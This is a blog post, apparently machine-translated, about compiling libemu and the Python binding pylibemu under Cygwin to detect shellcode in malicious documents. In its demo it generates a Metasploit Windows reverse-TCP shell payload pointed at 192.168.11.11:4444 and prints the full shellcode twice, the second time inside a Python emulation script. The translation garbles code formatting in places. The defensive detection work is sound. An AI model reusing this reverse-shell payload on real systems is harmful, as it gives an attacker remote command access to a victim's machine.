There is an inexplicable excitement when I see python. I personally think that the simpler programming, the better. Today, when IT staff are defined as 21 Century miners, the more code you write, the more resources you mine, but not the more valuable resources you mine. Moreover, many people in China are digging the remaining slag.
After reading a DVLabs article "Shellcode Detection Using Python", I started to practice it. Dvlabs said: "They collect a large number of files and documents. To identify these documents, they are malicious and require a lot of manual analysis, they wanted to use automated analysis to reduce the workload. One of the main ways to automate malicious document analysis is shellcode Detection, which checks whether the document contains shellcode ".
DVLabs mentioned two python-based shellcode detection tools: Pylibemu and Pylibscizzle.
Pylibemu encapsulates Libemu http://libemu.carnivore.it/to provide more functions without increasing the usage. One important function of Pylibemu is test (). This function shows the windows API information that shellcode calls.
Actual Pylibemu test:
Install Pylibemu. Download https://github.com/buffer/pylibemuand download libemu.
Git clone git: // git. carnivore. it/libemu. git
In windows, git can use msysgit (http://code.google.com/p/msysgit/downloads/list)
My test environment is windows 7. To use libemu on windows, Cygwin needs to be installed and the following packages are required:
-Gcc;
-Make;
-Automake;
-Libtool;
-Gettext-devel;
-Python
The downloaded libemu is placed in the specified directory. It is best to set the Cygwin environment variable in windows.
Add AC_CONFIG_MACRO_DIR ([m4]) to configure. ac. The content is as follows:
#-*-Mode: m4 ;-*-
#-*-Autoconf -*-
# Process this file with autoconf to produce a configure script.
# $ Id $
AC_CONFIG_MACRO_DIR ([m4])
AC_PREREQ (2.59)
....
Switch to the libemu directory under the Cygwin command line and enter autoreconf-v-I.
Delete the AC_CONFIG_MACRO_DIR ([m4]) added in configure. ac.
Enter./configure -- prefix =/opt/libemu in the Cygwin command line, and an error will be prompted:
Checking for cargos-lib.h... no
Configure: creating./config. status
. In 'ig. status: error: cannot find input file: 'makefile
Solution: first use notpad ++ to convert the configure file to windows format and save it. Convert the configure file and save it in linux format.
Run./configure -- prefix =/opt/libemu again
Run make and the following error occurs:
C0: warnings being treated as errors
Userhooks. c: In function 'append ':
Userhooks. c: 168: 3: error: array subscript has type 'Char'
Makefile: 365: recipe for target 'sctest-userhooks. o' failed
Make [3]: *** [sctest-userhooks.o] Error 1
Make [3]: Leaving directory '/cygdrive/f/linux/libemu/tools/sctest'
Makefile: 264: recipe for target 'all-records' failed
Make [2]: *** [all-recursive] Error 1
Make [2]: Leaving directory '/cygdrive/f/linux/libemu/tools'
Makefile: 353: recipe for target 'all-records' failed
Make [1]: *** [all-recursive] Error 1
Make [1]: Leaving directory '/cygdrive/f/linux/libemu'
Makefile: 260: recipe for target 'all' failed
Make: *** [all] Error 2
Solution: Modify the 168 behavior of userhooks. c under the tools \ sctest directory.
If (isprint (int) data [I]) // | isblank (data [I])
Run make install www.2cto.com
Running build
Running build_ext
Decompress Pylibeum to the specified directory and run the Cygwin command line.
Run python setup. py build
Running build
Running build_ext
Run python setup. py install
Running install
Running build
Running build_ext
Building 'pylibemu' extension
...
Copying build/lib. cygwin-1.7.9-i686-2.6/pylibemu. dll->/usr/lib/python2.6/site-packages
Running install_egg_info
Writing/usr/lib/python2.6/site-packages/pylibemu-0.1.4-py2.6.egg-info
After successful installation, run python in cygwin and enter the python interactive command line.
Import pylibemu
The tragedy happened and the following error was prompted:
>>> Import pylibemu
Traceback (most recent call last ):
File "<stdin>", line 1, in <module>
ImportError: No such file or directory
It took me nearly one afternoon to solve this problem. In fact, many python installation packages will encounter this problem in cygwin. if you carefully view the installation information of pylibemu, you will find that, pylibemu only writes pylibemu-0.1.4-py2.6.egg-info and pylibemu to the site-packages directory. dll file, that is, the object file only has pylibemu. dll, finally found a related article through google, the author said that for the cygwin python module only dll No such file or directory, the reason may be that dll cannot be loaded, after a careful look at ImportError, the system prompts that the file or directory does not exist, rather than the module does not exist.
Run cygcheck.exe/usr/lib/python2.6/site-packages/pylibemu. dll
The following error is prompted:
F: \ cygwin \ lib \ python2.6 \ site-packages \ pylibemu. dll
Cygcheck: track_down: cocould not find cygemu-2.dll
The original is unable to find the cygemu-2.dll, resulting in pylibemu. dll cannot be loaded. Cygemu-2.dll is the libemu file compiled under cygwin, the file in the/opt/libemu/bin directory, may be that I did not add environment variables, I Have To Do not add environment variables, but the cygemu-2.dll to the cygwin bin directory under a copy.
The problem of running import pylibemu in python environment is successfully solved.
Demo:
Use metasploit to generate a reverse shellcode
Msf> use windows/shell_reverse_tcp
Msf payload (shell_reverse_tcp)> set LHOST 192.168.11.11
LHOST => 192.168.11.11
Msf payload (shell_reverse_tcp)> generate-t ruby
View sourceprint? 01 # windows/shell_reverse_tcp-314 bytes
# Http://www.metasploit.com
03 # VERBOSE = false, LHOST = 192.168.11.11, LPORT = 4444,
04 # ReverseConnectRetries = 5, EXITFUNC = process,
05 # InitialAutoRunScript =, AutoRunScript =
06 buf = "\ xfc \ xe8 \ x89 \ x00 \ x00 \ x00 \ x60 \ x89 \ xe5 \ x31 \ xd2 \ x64 \ x8b \ x52"
07 + "\ x30 \ x8b \ x52 \ x0c \ x8b \ x52 \ x14 \ x8b \ x72 \ x28 \ x0f \ xb7 \ x4a \ x26"
08 + "\ x31 \ xff \ x31 \ xc0 \ xac \ x3c \ x61 \ x7c \ x02 \ x2c \ x20 \ xc1 \ xcf \ x0d"
09 + "\ x01 \ xc7 \ xe2 \ xf0 \ x52 \ x57 \ x8b \ x52 \ x10 \ x8b \ x42 \ x3c \ x01 \ xd0"
10 + "\ x8b \ x40 \ x78 \ x85 \ xc0 \ x74 \ x4a \ x01 \ xd0 \ x50 \ x8b \ x48 \ x18 \ x8b"
11 + "\ x58 \ x20 \ x01 \ xd3 \ xe3 \ x3c \ x49 \ x8b \ x34 \ x8b \ x01 \ xd6 \ x31 \ xff"
12 + "\ x31 \ xc0 \ xac \ xc1 \ xcf \ x0d \ x01 \ xc7 \ x38 \ xe0 \ x75 \ xf4 \ x03 \ x7d"
13 + "\ xf8 \ x3b \ x7d \ x24 \ x75 \ xe2 \ x58 \ x8b \ x58 \ x24 \ x01 \ xd3 \ x66 \ x8b"
14 + "\ x0c \ x4b \ x8b \ x58 \ x1c \ x01 \ xd3 \ x8b \ x04 \ x8b \ x01 \ xd0 \ x89 \ x44"
15 + "\ x24 \ x24 \ x5b \ x5b \ x61 \ x59 \ x5a \ x51 \ xff \ xe0 \ x58 \ x5f \ x5a \ x8b"
16 + "\ x12 \ xeb \ x86 \ x5d \ x68 \ x33 \ x32 \ x00 \ x00 \ x68 \ x77 \ x73 \ x32 \ x5f"
17 + "\ x54 \ x68 \ x4c \ x77 \ x26 \ x07 \ xff \ xd5 \ xb8 \ x90 \ x01 \ x00 \ x00 \ x29"
18 + "\ xc4 \ x54 \ x50 \ x68 \ x29 \ x80 \ x6b \ x00 \ xff \ xd5 \ x50 \ x50 \ x50 \ x50"
19 + "\ x40 \ x50 \ x40 \ x50 \ x68 \ xea \ x0f \ xdf \ xe0 \ xff \ xd5 \ x89 \ xc7 \ x68"
20 + "\ xc0 \ xa8 \ x0b \ x0b \ x68 \ x02 \ x00 \ x11 \ x5c \ x89 \ xe6 \ x6a \ x10 \ x56"
21 + "\ x57 \ x68 \ x99 \ xa5 \ x74 \ x61 \ xff \ xd5 \ x68 \ x63 \ x6d \ x64 \ x00 \ x89"
22 + "\ xe3 \ x57 \ x57 \ x57 \ x31 \ xf6 \ x6a \ x12 \ x59 \ x56 \ xe2 \ xfd \ x66 \ xc7"
23 + "\ x44 \ x24 \ x3c \ x01 \ x01 \ x8d \ x44 \ x24 \ x10 \ xc6 \ x00 \ x44 \ x54 \ x50"
24 + "\ x56 \ x56 \ x56 \ x46 \ x56 \ x4e \ x56 \ x56 \ x53 \ x56 \ x68 \ x79 \ xcc \ x3f"
25 + "\ x86 \ xff \ xd5 \ x89 \ xe0 \ x4e \ x56 \ x46 \ xff \ x30 \ x68 \ x08 \ x87 \ x1d"
26 + "\ x60 \ xff \ xd5 \ xbb \ xf0 \ xb5 \ xa2 \ x56 \ x68 \ xa6 \ x95 \ xbd \ x9d \ xff"
27 + "\ xd5 \ x3c \ x06 \ x7c \ x0a \ x80 \ xfb \ xe0 \ x75 \ x05 \ xbb \ x47 \ x13 \ x72"
28 + "\ x6f \ x6a \ x00 \ x53 \ xff \ xd5"
Python test code:
View sourceprint? 01 #! /Usr/bin/python
02 import pylibemu
03 shellcode = ("\ xfc \ xe8 \ x89 \ x00 \ x00 \ x00 \ x60 \ x89 \ xe5 \ x31 \ xd2 \ x64 \ x8b \ x52"
04 + "\ x30 \ x8b \ x52 \ x0c \ x8b \ x52 \ x14 \ x8b \ x72 \ x28 \ x0f \ xb7 \ x4a \ x26"
05 + "\ x31 \ xff \ x31 \ xc0 \ xac \ x3c \ x61 \ x7c \ x02 \ x2c \ x20 \ xc1 \ xcf \ x0d"
06 + "\ x01 \ xc7 \ xe2 \ xf0 \ x52 \ x57 \ x8b \ x52 \ x10 \ x8b \ x42 \ x3c \ x01 \ xd0"
07 + "\ x8b \ x40 \ x78 \ x85 \ xc0 \ x74 \ x4a \ x01 \ xd0 \ x50 \ x8b \ x48 \ x18 \ x8b"
08 + "\ x58 \ x20 \ x01 \ xd3 \ xe3 \ x3c \ x49 \ x8b \ x34 \ x8b \ x01 \ xd6 \ x31 \ xff"
09 + "\ x31 \ xc0 \ xac \ xc1 \ xcf \ x0d \ x01 \ xc7 \ x38 \ xe0 \ x75 \ xf4 \ x03 \ x7d"
10 + "\ xf8 \ x3b \ x7d \ x24 \ x75 \ xe2 \ x58 \ x8b \ x58 \ x24 \ x01 \ xd3 \ x66 \ x8b"
11 + "\ x0c \ x4b \ x8b \ x58 \ x1c \ x01 \ xd3 \ x8b \ x04 \ x8b \ x01 \ xd0 \ x89 \ x44"
12 + "\ x24 \ x24 \ x5b \ x5b \ x61 \ x59 \ x5a \ x51 \ xff \ xe0 \ x58 \ x5f \ x5a \ x8b"
13 + "\ x12 \ xeb \ x86 \ x5d \ x68 \ x33 \ x32 \ x00 \ x00 \ x68 \ x77 \ x73 \ x32 \ x5f"
14 + "\ x54 \ x68 \ x4c \ x77 \ x26 \ x07 \ xff \ xd5 \ xb8 \ x90 \ x01 \ x00 \ x00 \ x29"
15 + "\ xc4 \ x54 \ x50 \ x68 \ x29 \ x80 \ x6b \ x00 \ xff \ xd5 \ x50 \ x50 \ x50 \ x50"
16 + "\ x40 \ x50 \ x40 \ x50 \ x68 \ xea \ x0f \ xdf \ xe0 \ xff \ xd5 \ x89 \ xc7 \ x68"
17 + "\ xc0 \ xa8 \ x0b \ x0b \ x68 \ x02 \ x00 \ x11 \ x5c \ x89 \ xe6 \ x6a \ x10 \ x56"
18 + "\ x57 \ x68 \ x99 \ xa5 \ x74 \ x61 \ xff \ xd5 \ x68 \ x63 \ x6d \ x64 \ x00 \ x89"
19 + "\ xe3 \ x57 \ x57 \ x57 \ x31 \ xf6 \ x6a \ x12 \ x59 \ x56 \ xe2 \ xfd \ x66 \ xc7"
20 + "\ x44 \ x24 \ x3c \ x01 \ x01 \ x8d \ x44 \ x24 \ x10 \ xc6 \ x00 \ x44 \ x54 \ x50"
21 + "\ x56 \ x56 \ x56 \ x46 \ x56 \ x4e \ x56 \ x56 \ x53 \ x56 \ x68 \ x79 \ xcc \ x3f"
22 + "\ x86 \ xff \ xd5 \ x89 \ xe0 \ x4e \ x56 \ x46 \ xff \ x30 \ x68 \ x08 \ x87 \ x1d"
23 + "\ x60 \ xff \ xd5 \ xbb \ xf0 \ xb5 \ xa2 \ x56 \ x68 \ xa6 \ x95 \ xbd \ x9d \ xff"
24 + "\ xd5 \ x3c \ x06 \ x7c \ x0a \ x80 \ xfb \ xe0 \ x75 \ x05 \ xbb \ x47 \ x13 \ x72"
25 + "\ x6f \ x6a \ x00 \ x53 \ xff \ xd5 ")
26 emulator = pylibemu. Emulator ()
27 emulator. prepare (shellcode, 1)
28 emulator. test ()
29 print emulator. emu_profile_output
Result:
HMODULE LoadLibraryA (
LPCTSTR = 0x00c3c590 =>
= "Ws2_32 ";
) = 1906376704;
In fact, pylibemu can execute dynamic shellcode. It is not ideal to check whether shellcode exists in the document. Pylibscizzle is better than it in this respect. Next, we will introduce Pylibscizzle and compare it with pylibemu in shellcode Detection.
Author: wpulog
Data: 2011/12/27
Reference: http://dvlabs.tippingpoint.com/blog/2011/12/05/shellcode-detection-python